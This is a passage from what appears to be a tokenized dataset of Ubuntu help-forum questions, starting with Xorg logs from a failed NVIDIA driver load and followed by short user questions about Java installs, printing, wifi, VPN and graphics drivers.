devices become available , reconfigure udev or disable autoadddevices . [ 404.481 ] ( ii ) loader magic : 0x7fdb87699c40 [ 404.481 ] ( ii ) module abi versions : [ 404.481 ] x.org ansi c emulation : 0.4 [ 404.481 ] x.org video driver : 13.0 [ 404.481 ] x.org xinput driver : 18.0 [ 404.481 ] x.org server extension : 7.0 [ 404.482 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0ca2:174b:2150 rev 162 , mem @ 0xfd000000/16777216 , 0xd0000000/268435456 , 0xce000000/33554432 , i/o @ 0x0000dc00/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 404.483 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 404.483 ] initializing built-in extension generic event extension [ 404.483 ] initializing built-in extension shape [ 404.483 ] initializing built-in extension mit-shm [ 404.483 ] initializing built-in extension xinputextension [ 404.483 ] initializing built-in extension xtest [ 404.483 ] initializing built-in extension big-requests [ 404.483 ] initializing built-in extension sync [ 404.483 ] initializing built-in extension xkeyboard [ 404.483 ] initializing built-in extension xc-misc [ 404.483 ] initializing built-in extension security [ 404.483 ] initializing built-in extension xinerama [ 404.483 ] initializing built-in extension xfixes [ 404.483 ] initializing built-in extension render [ 404.483 ] initializing built-in extension randr [ 404.483 ] initializing built-in extension composite [ 404.483 ] initializing built-in extension damage [ 404.483 ] initializing built-in extension mit-screen-saver [ 404.483 ] initializing built-in extension double-buffer [ 404.483 ] initializing built-in extension record [ 404.483 ] initializing built-in extension dpms [ 404.483 ] initializing built-in extension x-resource [ 404.483 ] initializing built-in extension xvideo [ 404.483 ] initializing built-in extension xvideo-motioncompensation [ 404.483 ] initializing built-in extension xfree86-vidmodeextension [ 404.483 ] initializing built-in extension xfree86-dga [ 404.483 ] initializing built-in extension xfree86-dri [ 404.483 ] initializing built-in extension dri2 [ 404.483 ] ( ii ) loadmodule : `` glx '' [ 404.483 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 404.490 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 404.490 ] compiled for 4.0.2 , module version = 1.0.0 [ 404.490 ] module class : x.org server extension [ 404.490 ] ( ii ) nvidia glx module 173.14.36 wed sep 12 01:06:34 pdt 2012 [ 404.490 ] loading extension glx [ 404.490 ] ( == ) matched nvidia as autoconfigured driver 0 [ 404.490 ] ( == ) matched nouveau as autoconfigured driver 1 [ 404.490 ] ( == ) matched nv as autoconfigured driver 2 [ 404.490 ] ( == ) matched vesa as autoconfigured driver 3 [ 404.490 ] ( == ) matched modesetting as autoconfigured driver 4 [ 404.490 ] ( == ) matched fbdev as autoconfigured driver 5 [ 404.490 ] ( == ) assigned the driver to the xf86configlayout [ 404.490 ] ( ii ) loadmodule : `` nvidia '' [ 404.490 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 404.491 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 404.491 ] compiled for 4.0.2 , module version = 1.0.0 [ 404.491 ] module class : x.org video driver [ 404.491 ] ( ii ) loadmodule : `` nouveau '' [ 404.491 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 404.491 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 404.491 ] compiled for 1.13.0 , module version = 1.0.2 [ 404.491 ] module class : x.org video driver [ 404.491 ] abi class : x.org video driver , version 13.0 [ 404.491 ] ( ii ) loadmodule : `` nv '' [ 404.491 ] ( ww ) warning , could n't open module nv [ 404.492 ] ( ii ) unloadmodule : `` nv '' [ 404.492 ] ( ii ) unloading nv [ 404.492 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 404.492 ] ( ii ) loadmodule : `` vesa '' [ 404.492 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 404.492 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 404.492 ] compiled for 1.12.99.902 , module version = 2.3.2 [ 404.492 ] module class : x.org video driver [ 404.492 ] abi class : x.org video driver , version 13.0 [ 404.492 ] ( ii ) loadmodule : `` modesetting '' [ 404.492 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 404.492 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 404.492 ] compiled for 1.13.0 , module version = 0.5.0 [ 404.492 ] module class : x.org video driver [ 404.492 ] abi class : x.org video driver , version 13.0 [ 404.492 ] ( ii ) loadmodule : `` fbdev '' [ 404.492 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 404.492 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 404.492 ] compiled for 1.12.99.902 , module version = 0.4.3 [ 404.492 ] module class : x.org video driver [ 404.492 ] abi class : x.org video driver , version 13.0 [ 404.492 ] ( == ) matched nvidia as autoconfigured driver 0 [ 404.492 ] ( == ) matched nouveau as autoconfigured driver 1 [ 404.492 ] ( == ) matched nv as autoconfigured driver 2 [ 404.492 ] ( == ) matched vesa as autoconfigured driver 3 [ 404.492 ] ( == ) matched modesetting as autoconfigured driver 4 [ 404.492 ] ( == ) matched fbdev as autoconfigured driver 5 [ 404.492 ] ( == ) assigned the driver to the xf86configlayout [ 404.492 ] ( ii ) loadmodule : `` nvidia '' [ 404.492 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 404.492 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 404.492 ] compiled for 4.0.2 , module version = 1.0.0 [ 404.492 ] module class : x.org video driver [ 404.492 ] ( ii ) unloadmodule : `` nvidia '' [ 404.492 ] ( ii ) unloading nvidia [ 404.492 ] ( ii ) failed to load module `` nvidia '' ( already loaded , 32731 ) [ 404.492 ] ( ii ) loadmodule : `` nouveau '' [ 404.493 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 404.493 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 404.493 ] compiled for 1.13.0 , module version = 1.0.2 [ 404.493 ] module class : x.org video driver [ 404.493 ] abi class : x.org video driver , version 13.0 [ 404.493 ] ( ii ) unloadmodule : `` nouveau '' [ 404.493 ] ( ii ) unloading nouveau [ 404.493 ] ( ii ) failed to load module `` nouveau '' ( already loaded , 32731 ) [ 404.493 ] ( ii ) loadmodule : `` nv '' [ 404.493 ] ( ww ) warning , could n't open module nv [ 404.493 ] ( ii ) unloadmodule : `` nv '' [ 404.493 ] ( ii ) unloading nv [ 404.493 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 404.493 ] ( ii ) loadmodule : `` vesa '' [ 404.493 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 404.493 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 404.493 ] compiled for 1.12.99.902 , module version = 2.3.2 [ 404.493 ] module class : x.org video driver [ 404.493 ] abi class : x.org video driver , version 13.0 [ 404.493 ] ( ii ) unloadmodule : `` vesa '' [ 404.493 ] ( ii ) unloading vesa [ 404.493 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 404.493 ] ( ii ) loadmodule : `` modesetting '' [ 404.493 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 404.493 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 404.493 ] compiled for 1.13.0 , module version = 0.5.0 [ 404.493 ] module class : x.org video driver [ 404.493 ] abi class : x.org video driver , version 13.0 [ 404.493 ] ( ii ) unloadmodule : `` modesetting '' [ 404.493 ] ( ii ) unloading modesetting [ 404.493 ] ( ii ) failed to load module `` modesetting '' ( already loaded , 0 ) [ 404.493 ] ( ii ) loadmodule : `` fbdev '' [ 404.494 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 404.494 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 404.494 ] compiled for 1.12.99.902 , module version = 0.4.3 [ 404.494 ] module class : x.org video driver [ 404.494 ] abi class : x.org video driver , version 13.0 [ 404.494 ] ( ii ) unloadmodule : `` fbdev '' [ 404.494 ] ( ii ) unloading fbdev [ 404.494 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 404.494 ] ( ii ) nvidia dlloader x driver 173.14.36 wed sep 12 00:56:02 pdt 2012 [ 404.494 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 404.494 ] ( ii ) nouveau driver date : wed sep 12 13:42:43 2012 +0200 [ 404.494 ] ( ii ) nouveau driver for nvidia chipset families : [ 404.494 ] riva tnt ( nv04 ) [ 404.494 ] riva tnt2 ( nv05 ) [ 404.494 ] geforce 256 ( nv10 ) [ 404.494 ] geforce 2 ( nv11 , nv15 ) [ 404.494 ] geforce 4mx ( nv17 , nv18 ) [ 404.494 ] geforce 3 ( nv20 ) [ 404.494 ] geforce 4ti ( nv25 , nv28 ) [ 404.494 ] geforce fx ( nv3x ) [ 404.494 ] geforce 6 ( nv4x ) [ 404.494 ] geforce 7 ( g7x ) [ 404.494 ] geforce 8 ( g8x ) [ 404.494 ] geforce gtx 200 ( nva0 ) [ 404.494 ] geforce gtx 400 ( nvc0 ) [ 404.494 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 404.494 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 404.494 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 404.494 ] ( ++ ) using vt number 7 [ 404.494 ] ( ii ) loading sub module `` fb '' [ 404.494 ] ( ii ) loadmodule : `` fb '' [ 404.494 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 404.494 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 404.494 ] compiled for 1.13.0 , module version = 1.0.0 [ 404.494 ] abi class : x.org ansi c emulation , version 0.4 [ 404.494 ] ( ii ) loading sub module `` wfb '' [ 404.494 ] ( ii ) loadmodule : `` wfb '' [ 404.495 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 404.495 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 404.495 ] compiled for 1.13.0 , module version = 1.0.0 [ 404.495 ] abi class : x.org ansi c emulation , version 0.4 [ 404.495 ] ( ii ) loading sub module `` ramdac '' [ 404.495 ] ( ii ) loadmodule : `` ramdac '' [ 404.495 ] ( ii ) module `` ramdac '' already built-in [ 404.495 ] ( ww ) falling back to old probe method for vesa [ 404.495 ] ( ww ) falling back to old probe method for modesetting [ 404.495 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 404.495 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 404.495 ] ( ww ) falling back to old probe method for fbdev [ 404.495 ] ( ii ) loading sub module `` fbdevhw '' [ 404.495 ] ( ii ) loadmodule : `` fbdevhw '' [ 404.495 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 404.495 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 404.495 ] compiled for 1.13.0 , module version = 0.0.2 [ 404.495 ] abi class : x.org video driver , version 13.0 [ 404.495 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 404.495 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 404.495 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 404.495 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 404.495 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 404.495 ] ( ** ) nvidia ( 0 ) : enabling render acceleration [ 404.495 ] ( ii ) nvidia ( 0 ) : support for glx with the damage and composite x extensions is [ 404.495 ] ( ii ) nvidia ( 0 ) : enabled . [ 404.497 ] ( ee ) nvidia ( 0 ) : failed to load the nvidia kernel module ! [ 404.497 ] ( ee ) nvidia ( 0 ) : *** aborting *** [ 404.497 ] ( ii ) unloadmodule : `` nvidia '' [ 404.497 ] ( ii ) unloadsubmodule : `` wfb '' [ 404.497 ] ( ii ) unloadsubmodule : `` fb '' [ 404.497 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 404.497 ] fatal server error : [ 404.497 ] no screens found [ 404.497 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 404.497 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 404.497 ] ( ee ) [ 404.501 ] server terminated with error ( 1 ) . closing log file . edit : start of output from xorg.0.log with nvidia-current ( remember i get a low res display , my screen is called `` laptop '' and nvidia-settings says i 'm not using the nvidia driver ) : [ 192.911 ] x.org x server 1.13.0 release date : 2012-09-05 [ 192.912 ] x protocol version 11 , revision 0 [ 192.912 ] build operating system : linux 3.2.0-32-generic x86_64 ubuntu [ 192.912 ] current operating system : linux matthew-pc 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 [ 192.912 ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-17-generic root=uuid=278a7dd6-0d6c-46e5-87e4-34a86130220d ro quiet splash [ 192.912 ] build date : 27 november 2012 07:44:35am [ 192.912 ] xorg-server 2:1.13.0-0ubuntu6.1 ( for technical support please see http : //www.ubuntu.com/support ) [ 192.912 ] current version of pixman : 0.26.0 [ 192.912 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 192.912 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 192.912 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat mar 23 16:00:03 2013 [ 192.912 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 192.912 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 192.912 ] ( == ) serverlayout `` layout0 '' [ 192.912 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 192.912 ] ( ** ) | | -- > monitor `` monitor0 '' [ 192.913 ] ( ** ) | | -- > device `` device0 '' [ 192.913 ] ( ** ) | -- > input device `` keyboard0 '' [ 192.913 ] ( ** ) | -- > input device `` mouse0 '' [ 192.913 ] ( == ) automatically adding devices [ 192.913 ] ( == ) automatically enabling devices [ 192.913 ] ( == ) automatically adding gpu devices [ 192.913 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 192.913 ] entry deleted from font path . [ 192.913 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 192.913 ] entry deleted from font path . [ 192.913 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 192.913 ] entry deleted from font path . [ 192.913 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 192.913 ] entry deleted from font path . [ 192.913 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 192.913 ] entry deleted from font path . [ 192.913 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 192.913 ] entry deleted from font path . [ 192.913 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 192.913 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 192.913 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 192.913 ] ( ww ) disabling keyboard0 [ 192.913 ] ( ww ) disabling mouse0 [ 192.913 ] ( ii ) loader magic : 0x7f3790dbac40 [ 192.913 ] ( ii ) module abi versions : [ 192.913 ] x.org ansi c emulation : 0.4 [ 192.913 ] x.org video driver : 13.0 [ 192.913 ] x.org xinput driver : 18.0 [ 192.913 ] x.org server extension : 7.0 [ 192.914 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0ca2:174b:2150 rev 162 , mem @ 0xfd000000/16777216 , 0xd0000000/268435456 , 0xce000000/33554432 , i/o @ 0x0000dc00/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 192.914 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 192.914 ] initializing built-in extension generic event extension [ 192.914 ] initializing built-in extension shape [ 192.914 ] initializing built-in extension mit-shm [ 192.914 ] initializing built-in extension xinputextension [ 192.914 ] initializing built-in extension xtest [ 192.914 ] initializing built-in extension big-requests [ 192.914 ] initializing built-in extension sync [ 192.914 ] initializing built-in extension xkeyboard [ 192.914 ] initializing built-in extension xc-misc [ 192.914 ] initializing built-in extension security [ 192.914 ] initializing built-in extension xinerama [ 192.914 ] initializing built-in extension xfixes [ 192.914 ] initializing built-in extension render [ 192.914 ] initializing built-in extension randr [ 192.914 ] initializing built-in extension composite [ 192.914 ] initializing built-in extension damage [ 192.914 ] initializing built-in extension mit-screen-saver [ 192.915 ] initializing built-in extension double-buffer [ 192.915 ] initializing built-in extension record [ 192.915 ] initializing built-in extension dpms [ 192.915 ] initializing built-in extension x-resource [ 192.915 ] initializing built-in extension xvideo [ 192.915 ] initializing built-in extension xvideo-motioncompensation [ 192.915 ] initializing built-in extension xfree86-vidmodeextension [ 192.915 ] initializing built-in extension xfree86-dga [ 192.915 ] initializing built-in extension xfree86-dri [ 192.915 ] initializing built-in extension dri2 [ 192.915 ] ( ii ) loadmodule : `` glx '' [ 192.915 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 192.928 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 192.928 ] compiled for 4.0.2 , module version = 1.0.0 [ 192.928 ] module class : x.org server extension [ 192.928 ] ( ii ) nvidia glx module 304.43 sun aug 19 20:34:01 pdt 2012 [ 192.928 ] loading extension glx [ 192.928 ] ( ii ) loadmodule : `` nvidia '' [ 192.928 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 192.928 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 192.928 ] compiled for 4.0.2 , module version = 1.0.0 [ 192.928 ] module class : x.org video driver [ 192.930 ] ( ee ) nvidia : failed to load the nvidia kernel module . please check your [ 192.931 ] ( ee ) nvidia : system 's kernel log for additional error messages . [ 192.931 ] ( ii ) unloadmodule : `` nvidia '' [ 192.931 ] ( ii ) unloading nvidia [ 192.931 ] ( ee ) failed to load module `` nvidia '' ( module-specific error , 0 ) [ 192.931 ] ( == ) matched nvidia as autoconfigured driver 0 [ 192.931 ] ( == ) matched nouveau as autoconfigured driver 1 [ 192.931 ] ( == ) matched nv as autoconfigured driver 2 [ 192.931 ] ( == ) matched vesa as autoconfigured driver 3 [ 192.931 ] ( == ) matched modesetting as autoconfigured driver 4 [ 192.931 ] ( == ) matched fbdev as autoconfigured driver 5 [ 192.931 ] ( == ) assigned the driver to the xf86configlayout [ 192.931 ] ( ii ) loadmodule : `` nvidia '' [ 192.931 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 192.931 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 192.931 ] compiled for 4.0.2 , module version = 1.0.0 [ 192.931 ] module class : x.org video driver [ 192.933 ] ( ee ) nvidia : failed to load the nvidia kernel module . please check your [ 192.933 ] ( ee ) nvidia : system 's kernel log for additional error messages . [ 192.933 ] ( ii ) unloadmodule : `` nvidia '' [ 192.933 ] ( ii ) unloading nvidia [ 192.933 ] ( ee ) failed to load module `` nvidia '' ( module-specific error , 0 ) [ 192.933 ] ( ii ) loadmodule : `` nouveau '' [ 192.934 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 192.934 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 192.934 ] compiled for 1.13.0 , module version = 1.0.2 [ 192.934 ] module class : x.org video driver [ 192.934 ] abi class : x.org video driver , version 13.0 [ 192.934 ] ( ii ) loadmodule : `` nv '' [ 192.934 ] ( ww ) warning , could n't open module nv [ 192.934 ] ( ii ) unloadmodule : `` nv '' [ 192.934 ] ( ii ) unloading nv [ 192.934 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 192.934 ] ( ii ) loadmodule : `` vesa '' [ 192.934 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 192.934 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 192.934 ] compiled for 1.12.99.902 , module version = 2.3.2 [ 192.934 ] module class : x.org video driver [ 192.934 ] abi class : x.org video driver , version 13.0 [ 192.934 ] ( ii ) loadmodule : `` modesetting '' [ 192.935 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 192.935 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 192.935 ] compiled for 1.13.0 , module version = 0.5.0 [ 192.935 ] module class : x.org video driver [ 192.935 ] abi class : x.org video driver , version 13.0 [ 192.935 ] ( ii ) loadmodule : `` fbdev '' [ 192.935 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 192.935 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 192.935 ] compiled for 1.12.99.902 , module version = 0.4.3 [ 192.935 ] module class : x.org video driver [ 192.935 ] abi class : x.org video driver , version 13.0 [ 192.935 ] ( ii ) nouveau driver date : wed sep 12 13:42:43 2012 +0200 [ 192.935 ] ( ii ) nouveau driver for nvidia chipset families : [ 192.935 ] riva tnt ( nv04 ) [ 192.935 ] riva tnt2 ( nv05 ) [ 192.935 ] geforce 256 ( nv10 ) [ 192.935 ] geforce 2 ( nv11 , nv15 ) [ 192.935 ] geforce 4mx ( nv17 , nv18 ) [ 192.935 ] geforce 3 ( nv20 ) [ 192.935 ] geforce 4ti ( nv25 , nv28 ) [ 192.935 ] geforce fx ( nv3x ) [ 192.935 ] geforce 6 ( nv4x ) [ 192.935 ] geforce 7 ( g7x ) [ 192.935 ] geforce 8 ( g8x ) [ 192.935 ] geforce gtx 200 ( nva0 ) [ 192.935 ] geforce gtx 400 ( nvc0 ) [ 192.935 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 192.935 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 192.935 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 192.935 ] ( -- ) using vt number 8 [ 193.022 ] ( ee ) [ drm ] failed to open device [ 193.022 ] ( ww ) falling back to old probe method for modesetting [ 193.023 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 193.023 ] ( ww ) falling back to old probe method for fbdev [ 193.023 ] ( ii ) loading sub module `` fbdevhw '' [ 193.023 ] ( ii ) loadmodule : `` fbdevhw '' [ 193.023 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 193.023 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 193.023 ] compiled for 1.13.0 , module version = 0.0.2 [ 193.023 ] abi class : x.org video driver , version 13.0 [ 193.023 ] ( ee ) open /dev/fb0 : no such file or directory [ 193.023 ] ( ii ) loading sub module `` vbe '' [ 193.023 ] ( ii ) loadmodule : `` vbe '' [ 193.023 ] ( ii ) loading /usr/lib/xorg/modules/libvbe.so [ 193.023 ] ( ii ) module vbe : vendor= '' x.org foundation '' [ 193.023 ] compiled for 1.13.0 , module version = 1.1.0 [ 193.023 ] abi class : x.org video driver , version 13.0 [ 193.023 ] ( ii ) loading sub module `` int10 '' [ 193.023 ] ( ii ) loadmodule : `` int10 '' [ 193.024 ] ( ii ) loading /usr/lib/xorg/modules/libint10.so [ 193.024 ] ( ii ) module int10 : vendor= '' x.org foundation '' [ 193.024 ] compiled for 1.13.0 , module version = 1.0.0 [ 193.024 ] abi class : x.org video driver , version 13.0 [ 193.024 ] ( ii ) vesa ( 0 ) : initializing int10 [ 193.024 ] ( ii ) vesa ( 0 ) : bad v_bios checksum [ 193.024 ] ( ii ) vesa ( 0 ) : primary v_bios segment is : 0xc000 [ 193.064 ] ( ii ) vesa ( 0 ) : vesa bios detected [ 193.064 ] ( ii ) vesa ( 0 ) : vesa vbe version 3.0 [ 193.064 ] ( ii ) vesa ( 0 ) : vesa vbe total mem : 14336 kb [ 193.064 ] ( ii ) vesa ( 0 ) : vesa vbe oem : nvidia [ 193.064 ] ( ii ) vesa ( 0 ) : vesa vbe oem software rev : 112.21 [ 193.064 ] ( ii ) vesa ( 0 ) : vesa vbe oem vendor : nvidia corporation [ 193.064 ] ( ii ) vesa ( 0 ) : vesa vbe oem product : gt215 board - 06840011 [ 193.064 ] ( ii ) vesa ( 0 ) : vesa vbe oem product rev : chip rev [ 193.137 ] ( ** ) vesa ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 193.137 ] ( == ) vesa ( 0 ) : rgb weight 888 [ 193.137 ] ( == ) vesa ( 0 ) : default visual is truecolor [ 193.137 ] ( == ) vesa ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 )
271590	i can not install java from the software center	i ca n't install openjdk from the software center , i get the error : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-7/openjdk-7-jre-lib_7u15-2.3.7-0ubuntu1~12.10_all.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-7/openjdk-7-jre-headless_7u15-2.3.7-0ubuntu1~12.10_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-7/openjdk-7-jre_7u15-2.3.7-0ubuntu1~12.10_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-7/icedtea-7-jre-jamvm_7u15-2.3.7-0ubuntu1~12.10_amd64.deb 404 not found [ ip : 91.189.92.200 80 ] it tells me to check my internet connection but i am connected ( or how else could i post this ) . any suggestions ?
271591	printing works from writer but not evince/okular etc . ( filter error )	i recently got a used printer ( hp laserjet 2200dn ) that i try to use with ubuntu 12.10 . the thing is , that whatever i try , i can not print pdf 's ( neither with evince nor okular ) . printing from libreoffice writer works like a charm though . i do have the hplip toolbox . anyone any ideas ? edit : i forgot to add that when i 'm trying to print a pdf it actually prints two pages : one is completely empty , on the other it states : error : invalidaccess offending command : filter stack : /subfiledecode endstream 0 -- nostringval -- -- nostringval -- 21 false
271593	how to boot from live-usb ?	i 've followed every step on : `` create a usb stick on windows '' but after it says everything is succesful , i open wubi , which is opened in arabic . i understand some of it , and continue to choose the button that tells me to restart now . after the computer restarts , it still opens in windows xp . any help would be very much appreciated .
271597	networkmanager openvpn problem	i 'm trying to set up an openvpn connection and i 've imported the correct .opvn file and provided the username and password . i do n't have a ca certificate so i left this field with the default option . unfortunately i can not save the configuration . any idea why or how i can avoid this problem . i tried creating the openvpn connection from the command line and it worked but i would be great if i could use the network manager . best regards , jo
271600	ubuntu 12.10 low video quality	i 've been using ubuntu since two months and one thing that worry me is that the video quality while playing hd videos is not that good as it is in windows . so i want to ask you if you know some way to increase the quality of video . here is the output from sudo lshw -c display *-display description : vga compatible controller product : gf119 [ geforce gt 610 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : f6000000-f6ffffff memory : e8000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f7000000-f707ffff also i 'm using vlc player to play videos and for video output rendering i 'm using opengl glx video output ( i tried and other video output rendering that vlc provides but found that was the best of them yet not so good ... ) . thanks in advance and sorry for my bad english : )
271601	how do i flush out the dns resolver cache ?	on microsoft windows os , at the command prompt , i issue the command ipconfig /flushdns to flush out the dns resolver cache . on ubuntu 12.10 , what is the corresponding command ?
271605	will i be able to upgrade the developer preview to the full version ?	will i be able to upgrade the ubuntu touch developer preview to the full version ? i installed the developer version and was curious if when released , would i be able to upgrade to the full version on my nexus 7 , thank you
271613	am i using the nouveau driver or the proprietary nvidia driver ?	for a long time , i have used the nvidia proprietary driver . in additional drivers the nvidia driver was activated . however , i just `` removed '' that driver because i would like to use the nouveau driver for other reasons . yet , i have reason to believe i am still using the nvidia driver as the output of modprobe -l is as follows : $ modprobe -l | grep 'nvidia' kernel/drivers/video/nvidia/nvidiafb.ko how do i really determine what driver i am using , and how to i enable nouveau ?
271619	ways to share specific desktop window/region via web ?	is there a package distributed through ubuntu which will let me record either a specific window or region/rectangle of my screen , or a website which can do the same ? specifically i would like : free service , or allows a free trial can livecast to web and share using a link ( no pins , registration procedures , etc . ) lets me share a region of my screen rather than the whole thing . i 've tried a number of java-based web tools and some windows ones through wine , but none seem to allow sharing a specific window : screenleap ( option to share window is grayed out ) join.me ( option to share window is grayed out ) yuuguu ( ca n't share windows on ubuntu ) screenr ( does n't seem to do live streams ) . ( p.s . i lack the requisite reputation to create a screen-sharing tag , so i 've tagged as best as i could . please feel free to adjust the tags as needed . )
271621	not able to change launcher icon size	just installed ubuntu 12.04 iam new to ubuntu os and facing little issues in using the same . my problem , 1. not able to change the font size of launcher , tried this below system settings -- > appearence -- > could not find change launcher icon size how to have a start button like in windows xp or something like in earlier ubuntu which had options like application places system easier to access than the launcher -thanks & regards , manju
271624	ubuntu wifi not connecting	i 'm running ubuntu 12.04 on an old laptop . ever since i upgraded it ( wiped it and put on a fresh install ) , i ca n't connect to wifi . unfortunately , i can not connect it to an ethernet cable at the momment , however , i have a win7 pc i can use . i downloaded the .deb driver onto the pc , and moved it over via a usb . i had to run the deb through terminal ( ubuntu software center did n't like it ) in order to get the firmware . i rebooted my computer , and it no longer says `` firmware missing '' , however it ca n't find any of the networks , and now says `` no network devices available '' has anybody found a fix ? ps i 'm using the broadcam-sta-common deb .
